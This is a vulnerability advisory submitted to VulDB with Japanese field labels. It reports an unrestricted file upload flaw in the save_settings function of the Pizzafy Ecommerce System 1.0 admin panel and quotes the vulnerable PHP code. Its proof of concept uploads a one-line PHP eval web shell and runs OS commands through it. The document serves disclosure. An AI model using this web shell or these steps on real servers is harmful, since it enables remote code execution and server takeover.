| タイトル | SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 Unrestricted Upload |
|---|
| 説明 | SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 is affected by an unrestricted file upload vulnerability in the save_settings function of the file /admin/admin_class_novo.php (endpoint /admin/ajax.php?action=save_settings, the Site Settings / Setting Handler component).
The handler reads the uploaded "Image" file from $_FILES['img'], builds the destination path from the attacker-controlled original filename ($_FILES['img']['name']) and moves it into the web-accessible directory ../assets/img/ via move_uploaded_file(). Although the file extension is computed with pathinfo(), it is never validated against an allow-list, and there is no MIME/content-type check and no filename randomization. As a result, files of any type (including .php) are stored under a predictable, directly reachable URL.
Affected code (admin_class_novo.php, save_settings):
if(!isset($_SESSION['login_id'])) { return 2; }
if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != '') {
$target_dir = "../assets/img/";
$file_name = $_FILES['img']['name'];
$target_file = $target_dir . $file_name;
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if(move_uploaded_file($_FILES['img']['tmp_name'], $target_file)) { ... }
}
Impact: an authenticated administrator can upload a PHP file and execute arbitrary OS commands (remote code execution) in the context of the web server.
Proof of Concept:
1. Log in to the admin panel.
2. Open /admin/index.php?page=site_settings.
3. In the Image field (name="img") upload poc.php containing: <?php eval($_GET[1]); ?>
4. Submit; the form posts to /admin/ajax.php?action=save_settings and the file is stored at /assets/img/poc.php.
5. Request /assets/img/poc.php?1=system('whoami'); to execute commands.
This vulnerability requires an authenticated administrator session. CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2). Note: this is a different sink than CVE-2026-7393, which affects the save_menu function; this report concerns the save_settings function.
|
|---|
| ソース | ⚠️ https://github.com/leidyardila981-creator/Pizzafy-Ecommerce-1.0-save_settings-File-Upload-RCE |
|---|
| ユーザー | q1w2e3r4t5y6 (UID 98995) |
|---|
| 送信 | 2026年06月14日 16:45 (1 月 ago) |
|---|
| モデレーション | 2026年07月18日 14:31 (1 month later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 380048 [SourceCodester Pizzafy Ecommerce System 1.0 admin_class_novo.php save_settings img 特権昇格] |
|---|
| ポイント | 20 |
|---|